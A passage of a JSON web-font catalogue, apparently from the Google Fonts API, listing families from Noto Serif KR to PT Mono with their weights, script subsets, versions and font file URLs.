        "200": "http://fonts.gstatic.com/s/notoserifkr/v7/3JnmSDn90Gmq2mr3blnHaTZXTihC8O1ZNH1ahck.otf",
        "300": "http://fonts.gstatic.com/s/notoserifkr/v7/3JnmSDn90Gmq2mr3blnHaTZXTkxB8O1ZNH1ahck.otf",
        "regular": "http://fonts.gstatic.com/s/notoserifkr/v7/3Jn7SDn90Gmq2mr3blnHaTZXduZp1ONyKHQ.otf",
        "500": "http://fonts.gstatic.com/s/notoserifkr/v7/3JnmSDn90Gmq2mr3blnHaTZXThRA8O1ZNH1ahck.otf",
        "600": "http://fonts.gstatic.com/s/notoserifkr/v7/3JnmSDn90Gmq2mr3blnHaTZXTjhH8O1ZNH1ahck.otf",
        "700": "http://fonts.gstatic.com/s/notoserifkr/v7/3JnmSDn90Gmq2mr3blnHaTZXTlxG8O1ZNH1ahck.otf",
        "900": "http://fonts.gstatic.com/s/notoserifkr/v7/3JnmSDn90Gmq2mr3blnHaTZXTmRE8O1ZNH1ahck.otf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Noto Serif SC",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "900"
      ],
      "subsets": [
        "chinese-simplified",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-11-12",
      "files": {
        "200": "http://fonts.gstatic.com/s/notoserifsc/v8/H4c8BXePl9DZ0Xe7gG9cyOj7mm63SzZBEtERe7U.otf",
        "300": "http://fonts.gstatic.com/s/notoserifsc/v8/H4c8BXePl9DZ0Xe7gG9cyOj7mgq0SzZBEtERe7U.otf",
        "regular": "http://fonts.gstatic.com/s/notoserifsc/v8/H4chBXePl9DZ0Xe7gG9cyOj7oqCcbzhqDtg.otf",
        "500": "http://fonts.gstatic.com/s/notoserifsc/v8/H4c8BXePl9DZ0Xe7gG9cyOj7mlK1SzZBEtERe7U.otf",
        "600": "http://fonts.gstatic.com/s/notoserifsc/v8/H4c8BXePl9DZ0Xe7gG9cyOj7mn6ySzZBEtERe7U.otf",
        "700": "http://fonts.gstatic.com/s/notoserifsc/v8/H4c8BXePl9DZ0Xe7gG9cyOj7mhqzSzZBEtERe7U.otf",
        "900": "http://fonts.gstatic.com/s/notoserifsc/v8/H4c8BXePl9DZ0Xe7gG9cyOj7miKxSzZBEtERe7U.otf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Noto Serif TC",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "900"
      ],
      "subsets": [
        "chinese-traditional",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-11-12",
      "files": {
        "200": "http://fonts.gstatic.com/s/notoseriftc/v8/XLY9IZb5bJNDGYxLBibeHZ0Bvr8vbX9GTsoOAX4.otf",
        "300": "http://fonts.gstatic.com/s/notoseriftc/v8/XLY9IZb5bJNDGYxLBibeHZ0BvtssbX9GTsoOAX4.otf",
        "regular": "http://fonts.gstatic.com/s/notoseriftc/v8/XLYgIZb5bJNDGYxLBibeHZ0BhnEESXFtUsM.otf",
        "500": "http://fonts.gstatic.com/s/notoseriftc/v8/XLY9IZb5bJNDGYxLBibeHZ0BvoMtbX9GTsoOAX4.otf",
        "600": "http://fonts.gstatic.com/s/notoseriftc/v8/XLY9IZb5bJNDGYxLBibeHZ0Bvq8qbX9GTsoOAX4.otf",
        "700": "http://fonts.gstatic.com/s/notoseriftc/v8/XLY9IZb5bJNDGYxLBibeHZ0BvssrbX9GTsoOAX4.otf",
        "900": "http://fonts.gstatic.com/s/notoseriftc/v8/XLY9IZb5bJNDGYxLBibeHZ0BvvMpbX9GTsoOAX4.otf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nova Cut",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/novacut/v12/KFOkCnSYu8mL-39LkWxPKTM1K9nz.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nova Flat",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/novaflat/v12/QdVUSTc-JgqpytEbVebEuStkm20oJA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nova Mono",
      "variants": [
        "regular"
      ],
      "subsets": [
        "greek",
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/novamono/v11/Cn-0JtiGWQ5Ajb--MRKfYGxYrdM9Sg.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nova Oval",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/novaoval/v12/jAnEgHdmANHvPenMaswCMY-h3cWkWg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nova Round",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/novaround/v12/flU9Rqquw5UhEnlwTJYTYYfeeetYEBc.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nova Script",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/novascript/v13/7Au7p_IpkSWSTWaFWkumvmQNEl0O0kEx.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nova Slim",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/novaslim/v12/Z9XUDmZNQAuem8jyZcn-yMOInrib9Q.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nova Square",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/novasquare/v13/RrQUbo9-9DV7b06QHgSWsZhARYMgGtWA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Numans",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/numans/v10/SlGRmQmGupYAfH8IYRggiHVqaQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nunito",
      "variants": [
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v14",
      "lastModified": "2020-09-10",
      "files": {
        "200": "http://fonts.gstatic.com/s/nunito/v14/XRXW3I6Li01BKofA-sekZuHJeTsfDQ.ttf",
        "200italic": "http://fonts.gstatic.com/s/nunito/v14/XRXQ3I6Li01BKofIMN5MZ-vNWz4PDWtj.ttf",
        "300": "http://fonts.gstatic.com/s/nunito/v14/XRXW3I6Li01BKofAnsSkZuHJeTsfDQ.ttf",
        "300italic": "http://fonts.gstatic.com/s/nunito/v14/XRXQ3I6Li01BKofIMN4oZOvNWz4PDWtj.ttf",
        "regular": "http://fonts.gstatic.com/s/nunito/v14/XRXV3I6Li01BKof4MuyAbsrVcA.ttf",
        "italic": "http://fonts.gstatic.com/s/nunito/v14/XRXX3I6Li01BKofIMOaETM_FcCIG.ttf",
        "600": "http://fonts.gstatic.com/s/nunito/v14/XRXW3I6Li01BKofA6sKkZuHJeTsfDQ.ttf",
        "600italic": "http://fonts.gstatic.com/s/nunito/v14/XRXQ3I6Li01BKofIMN5cYuvNWz4PDWtj.ttf",
        "700": "http://fonts.gstatic.com/s/nunito/v14/XRXW3I6Li01BKofAjsOkZuHJeTsfDQ.ttf",
        "700italic": "http://fonts.gstatic.com/s/nunito/v14/XRXQ3I6Li01BKofIMN44Y-vNWz4PDWtj.ttf",
        "800": "http://fonts.gstatic.com/s/nunito/v14/XRXW3I6Li01BKofAksCkZuHJeTsfDQ.ttf",
        "800italic": "http://fonts.gstatic.com/s/nunito/v14/XRXQ3I6Li01BKofIMN4kYOvNWz4PDWtj.ttf",
        "900": "http://fonts.gstatic.com/s/nunito/v14/XRXW3I6Li01BKofAtsGkZuHJeTsfDQ.ttf",
        "900italic": "http://fonts.gstatic.com/s/nunito/v14/XRXQ3I6Li01BKofIMN4AYevNWz4PDWtj.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nunito Sans",
      "variants": [
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-09-10",
      "files": {
        "200": "http://fonts.gstatic.com/s/nunitosans/v6/pe03MImSLYBIv1o4X1M8cc9yAv5qWVAgVol-.ttf",
        "200italic": "http://fonts.gstatic.com/s/nunitosans/v6/pe01MImSLYBIv1o4X1M8cce4GxZrU1QCU5l-06Y.ttf",
        "300": "http://fonts.gstatic.com/s/nunitosans/v6/pe03MImSLYBIv1o4X1M8cc8WAf5qWVAgVol-.ttf",
        "300italic": "http://fonts.gstatic.com/s/nunitosans/v6/pe01MImSLYBIv1o4X1M8cce4G3JoU1QCU5l-06Y.ttf",
        "regular": "http://fonts.gstatic.com/s/nunitosans/v6/pe0qMImSLYBIv1o4X1M8cfe6Kdpickwp.ttf",
        "italic": "http://fonts.gstatic.com/s/nunitosans/v6/pe0oMImSLYBIv1o4X1M8cce4I95Ad1wpT5A.ttf",
        "600": "http://fonts.gstatic.com/s/nunitosans/v6/pe03MImSLYBIv1o4X1M8cc9iB_5qWVAgVol-.ttf",
        "600italic": "http://fonts.gstatic.com/s/nunitosans/v6/pe01MImSLYBIv1o4X1M8cce4GwZuU1QCU5l-06Y.ttf",
        "700": "http://fonts.gstatic.com/s/nunitosans/v6/pe03MImSLYBIv1o4X1M8cc8GBv5qWVAgVol-.ttf",
        "700italic": "http://fonts.gstatic.com/s/nunitosans/v6/pe01MImSLYBIv1o4X1M8cce4G2JvU1QCU5l-06Y.ttf",
        "800": "http://fonts.gstatic.com/s/nunitosans/v6/pe03MImSLYBIv1o4X1M8cc8aBf5qWVAgVol-.ttf",
        "800italic": "http://fonts.gstatic.com/s/nunitosans/v6/pe01MImSLYBIv1o4X1M8cce4G35sU1QCU5l-06Y.ttf",
        "900": "http://fonts.gstatic.com/s/nunitosans/v6/pe03MImSLYBIv1o4X1M8cc8-BP5qWVAgVol-.ttf",
        "900italic": "http://fonts.gstatic.com/s/nunitosans/v6/pe01MImSLYBIv1o4X1M8cce4G1ptU1QCU5l-06Y.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Odibee Sans",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/odibeesans/v2/neIPzCSooYAho6WvjeToRYkyepH9qGsf.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Odor Mean Chey",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/odormeanchey/v12/raxkHiKDttkTe1aOGcJMR1A_4mrY2zqUKafv.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Offside",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/offside/v8/HI_KiYMWKa9QrAykQ5HiRp-dhpQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Old Standard TT",
      "variants": [
        "regular",
        "italic",
        "700"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v13",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/oldstandardtt/v13/MwQubh3o1vLImiwAVvYawgcf2eVurVC5RHdCZg.ttf",
        "italic": "http://fonts.gstatic.com/s/oldstandardtt/v13/MwQsbh3o1vLImiwAVvYawgcf2eVer1q9ZnJSZtQG.ttf",
        "700": "http://fonts.gstatic.com/s/oldstandardtt/v13/MwQrbh3o1vLImiwAVvYawgcf2eVWEX-dTFxeb80flQ.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Oldenburg",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/oldenburg/v8/fC1jPY5JYWzbywv7c4V6UU6oXyndrw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Oleo Script",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/oleoscript/v9/rax5HieDvtMOe0iICsUccBhasU7Q8Cad.ttf",
        "700": "http://fonts.gstatic.com/s/oleoscript/v9/raxkHieDvtMOe0iICsUccCDmnmrY2zqUKafv.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Oleo Script Swash Caps",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/oleoscriptswashcaps/v8/Noaj6Vb-w5SFbTTAsZP_7JkCS08K-jCzDn_HMXquSY0Hg90.ttf",
        "700": "http://fonts.gstatic.com/s/oleoscriptswashcaps/v8/Noag6Vb-w5SFbTTAsZP_7JkCS08K-jCzDn_HCcaBbYUsn9T5dt0.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Open Sans",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v18",
      "lastModified": "2020-09-15",
      "files": {
        "300": "http://fonts.gstatic.com/s/opensans/v18/mem5YaGs126MiZpBA-UN_r8-VeJoCqeDjg.ttf",
        "300italic": "http://fonts.gstatic.com/s/opensans/v18/memnYaGs126MiZpBA-UFUKWyV-hsKKKTjrPW.ttf",
        "regular": "http://fonts.gstatic.com/s/opensans/v18/mem8YaGs126MiZpBA-U1UpcaXcl0Aw.ttf",
        "italic": "http://fonts.gstatic.com/s/opensans/v18/mem6YaGs126MiZpBA-UFUJ0ef8xkA76a.ttf",
        "600": "http://fonts.gstatic.com/s/opensans/v18/mem5YaGs126MiZpBA-UNirk-VeJoCqeDjg.ttf",
        "600italic": "http://fonts.gstatic.com/s/opensans/v18/memnYaGs126MiZpBA-UFUKXGUehsKKKTjrPW.ttf",
        "700": "http://fonts.gstatic.com/s/opensans/v18/mem5YaGs126MiZpBA-UN7rg-VeJoCqeDjg.ttf",
        "700italic": "http://fonts.gstatic.com/s/opensans/v18/memnYaGs126MiZpBA-UFUKWiUOhsKKKTjrPW.ttf",
        "800": "http://fonts.gstatic.com/s/opensans/v18/mem5YaGs126MiZpBA-UN8rs-VeJoCqeDjg.ttf",
        "800italic": "http://fonts.gstatic.com/s/opensans/v18/memnYaGs126MiZpBA-UFUKW-U-hsKKKTjrPW.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Open Sans Condensed",
      "variants": [
        "300",
        "300italic",
        "700"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v15",
      "lastModified": "2020-09-10",
      "files": {
        "300": "http://fonts.gstatic.com/s/opensanscondensed/v15/z7NFdQDnbTkabZAIOl9il_O6KJj73e7Ff1GhPuLGRpWRyAs.ttf",
        "300italic": "http://fonts.gstatic.com/s/opensanscondensed/v15/z7NHdQDnbTkabZAIOl9il_O6KJj73e7Fd_-7suDMQreU2AsJSg.ttf",
        "700": "http://fonts.gstatic.com/s/opensanscondensed/v15/z7NFdQDnbTkabZAIOl9il_O6KJj73e7Ff0GmPuLGRpWRyAs.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Oranienbaum",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/oranienbaum/v9/OZpHg_txtzZKMuXLIVrx-3zn7kz3dpHc.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Orbitron",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v16",
      "lastModified": "2020-06-26",
      "files": {
        "regular": "http://fonts.gstatic.com/s/orbitron/v16/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nyGy6xpmIyXjU1pg.ttf",
        "500": "http://fonts.gstatic.com/s/orbitron/v16/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nyKS6xpmIyXjU1pg.ttf",
        "600": "http://fonts.gstatic.com/s/orbitron/v16/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nyxSmxpmIyXjU1pg.ttf",
        "700": "http://fonts.gstatic.com/s/orbitron/v16/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1ny_CmxpmIyXjU1pg.ttf",
        "800": "http://fonts.gstatic.com/s/orbitron/v16/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nymymxpmIyXjU1pg.ttf",
        "900": "http://fonts.gstatic.com/s/orbitron/v16/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nysimxpmIyXjU1pg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Oregano",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/oregano/v8/If2IXTPxciS3H4S2kZffPznO3yM.ttf",
        "italic": "http://fonts.gstatic.com/s/oregano/v8/If2KXTPxciS3H4S2oZXVOxvLzyP_qw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Orienta",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/orienta/v8/PlI9FlK4Jrl5Y9zNeyeo9HRFhcU.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Original Surfer",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/originalsurfer/v9/RWmQoKGZ9vIirYntXJ3_MbekzNMiDEtvAlaMKw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Oswald",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v35",
      "lastModified": "2020-07-13",
      "files": {
        "200": "http://fonts.gstatic.com/s/oswald/v35/TK3_WkUHHAIjg75cFRf3bXL8LICs13FvgUFoZAaRliE.ttf",
        "300": "http://fonts.gstatic.com/s/oswald/v35/TK3_WkUHHAIjg75cFRf3bXL8LICs169vgUFoZAaRliE.ttf",
        "regular": "http://fonts.gstatic.com/s/oswald/v35/TK3_WkUHHAIjg75cFRf3bXL8LICs1_FvgUFoZAaRliE.ttf",
        "500": "http://fonts.gstatic.com/s/oswald/v35/TK3_WkUHHAIjg75cFRf3bXL8LICs18NvgUFoZAaRliE.ttf",
        "600": "http://fonts.gstatic.com/s/oswald/v35/TK3_WkUHHAIjg75cFRf3bXL8LICs1y9ogUFoZAaRliE.ttf",
        "700": "http://fonts.gstatic.com/s/oswald/v35/TK3_WkUHHAIjg75cFRf3bXL8LICs1xZogUFoZAaRliE.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Over the Rainbow",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/overtherainbow/v11/11haGoXG1k_HKhMLUWz7Mc7vvW5upvOm9NA2XG0.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Overlock",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/overlock/v10/Z9XVDmdMWRiN1_T9Z4Te4u2El6GC.ttf",
        "italic": "http://fonts.gstatic.com/s/overlock/v10/Z9XTDmdMWRiN1_T9Z7Tc6OmmkrGC7Cs.ttf",
        "700": "http://fonts.gstatic.com/s/overlock/v10/Z9XSDmdMWRiN1_T9Z7xizcmMvL2L9TLT.ttf",
        "700italic": "http://fonts.gstatic.com/s/overlock/v10/Z9XQDmdMWRiN1_T9Z7Tc0FWJtrmp8CLTlNs.ttf",
        "900": "http://fonts.gstatic.com/s/overlock/v10/Z9XSDmdMWRiN1_T9Z7xaz8mMvL2L9TLT.ttf",
        "900italic": "http://fonts.gstatic.com/s/overlock/v10/Z9XQDmdMWRiN1_T9Z7Tc0G2Ltrmp8CLTlNs.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Overlock SC",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/overlocksc/v9/1cX3aUHKGZrstGAY8nwVzHGAq8Sk1PoH.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Overpass",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2020-09-10",
      "files": {
        "100": "http://fonts.gstatic.com/s/overpass/v5/qFdB35WCmI96Ajtm81nGU97gxhcJk1s.ttf",
        "100italic": "http://fonts.gstatic.com/s/overpass/v5/qFdD35WCmI96Ajtm81Gga7rqwjUMg1siNQ.ttf",
        "200": "http://fonts.gstatic.com/s/overpass/v5/qFdA35WCmI96Ajtm81lqcv7K6BsAikI7.ttf",
        "200italic": "http://fonts.gstatic.com/s/overpass/v5/qFdC35WCmI96Ajtm81GgaxbL4h8ij1I7LLE.ttf",
        "300": "http://fonts.gstatic.com/s/overpass/v5/qFdA35WCmI96Ajtm81kOcf7K6BsAikI7.ttf",
        "300italic": "http://fonts.gstatic.com/s/overpass/v5/qFdC35WCmI96Ajtm81Gga3LI4h8ij1I7LLE.ttf",
        "regular": "http://fonts.gstatic.com/s/overpass/v5/qFdH35WCmI96Ajtm82GiWdrCwwcJ.ttf",
        "italic": "http://fonts.gstatic.com/s/overpass/v5/qFdB35WCmI96Ajtm81GgU97gxhcJk1s.ttf",
        "600": "http://fonts.gstatic.com/s/overpass/v5/qFdA35WCmI96Ajtm81l6d_7K6BsAikI7.ttf",
        "600italic": "http://fonts.gstatic.com/s/overpass/v5/qFdC35WCmI96Ajtm81GgawbO4h8ij1I7LLE.ttf",
        "700": "http://fonts.gstatic.com/s/overpass/v5/qFdA35WCmI96Ajtm81kedv7K6BsAikI7.ttf",
        "700italic": "http://fonts.gstatic.com/s/overpass/v5/qFdC35WCmI96Ajtm81Gga2LP4h8ij1I7LLE.ttf",
        "800": "http://fonts.gstatic.com/s/overpass/v5/qFdA35WCmI96Ajtm81kCdf7K6BsAikI7.ttf",
        "800italic": "http://fonts.gstatic.com/s/overpass/v5/qFdC35WCmI96Ajtm81Gga37M4h8ij1I7LLE.ttf",
        "900": "http://fonts.gstatic.com/s/overpass/v5/qFdA35WCmI96Ajtm81kmdP7K6BsAikI7.ttf",
        "900italic": "http://fonts.gstatic.com/s/overpass/v5/qFdC35WCmI96Ajtm81Gga1rN4h8ij1I7LLE.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Overpass Mono",
      "variants": [
        "300",
        "regular",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/overpassmono/v6/_Xm3-H86tzKDdAPa-KPQZ-AC3oSWk_edB3Zf8EQ.ttf",
        "regular": "http://fonts.gstatic.com/s/overpassmono/v6/_Xmq-H86tzKDdAPa-KPQZ-AC5ii-t_-2G38.ttf",
        "600": "http://fonts.gstatic.com/s/overpassmono/v6/_Xm3-H86tzKDdAPa-KPQZ-AC3vCQk_edB3Zf8EQ.ttf",
        "700": "http://fonts.gstatic.com/s/overpassmono/v6/_Xm3-H86tzKDdAPa-KPQZ-AC3pSRk_edB3Zf8EQ.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ovo",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ovo/v12/yYLl0h7Wyfzjy4Q5_3WVxA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Oxanium",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v3",
      "lastModified": "2020-10-22",
      "files": {
        "200": "http://fonts.gstatic.com/s/oxanium/v3/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G83JfniMBXQ7d67x.ttf",
        "300": "http://fonts.gstatic.com/s/oxanium/v3/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G80XfniMBXQ7d67x.ttf",
        "regular": "http://fonts.gstatic.com/s/oxanium/v3/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G81JfniMBXQ7d67x.ttf",
        "500": "http://fonts.gstatic.com/s/oxanium/v3/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G817fniMBXQ7d67x.ttf",
        "600": "http://fonts.gstatic.com/s/oxanium/v3/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G82XeXiMBXQ7d67x.ttf",
        "700": "http://fonts.gstatic.com/s/oxanium/v3/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G82ueXiMBXQ7d67x.ttf",
        "800": "http://fonts.gstatic.com/s/oxanium/v3/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G83JeXiMBXQ7d67x.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Oxygen",
      "variants": [
        "300",
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-10",
      "files": {
        "300": "http://fonts.gstatic.com/s/oxygen/v10/2sDcZG1Wl4LcnbuCJW8Db2-4C7wFZQ.ttf",
        "regular": "http://fonts.gstatic.com/s/oxygen/v10/2sDfZG1Wl4Lcnbu6iUcnZ0SkAg.ttf",
        "700": "http://fonts.gstatic.com/s/oxygen/v10/2sDcZG1Wl4LcnbuCNWgDb2-4C7wFZQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Oxygen Mono",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/oxygenmono/v8/h0GsssGg9FxgDgCjLeAd7ijfze-PPlUu.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "PT Mono",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ptmono/v8/9oRONYoBnWILk-9ArCg5MtPyAcg.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
